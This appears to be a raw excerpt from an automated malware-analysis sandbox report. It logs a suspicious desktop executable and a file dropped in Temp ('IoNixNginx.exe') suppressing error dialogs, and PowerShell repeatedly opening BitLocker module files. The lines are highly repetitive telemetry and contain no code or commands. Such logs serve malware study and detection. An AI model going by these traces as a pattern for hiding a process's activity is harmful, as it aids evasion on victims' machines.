Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
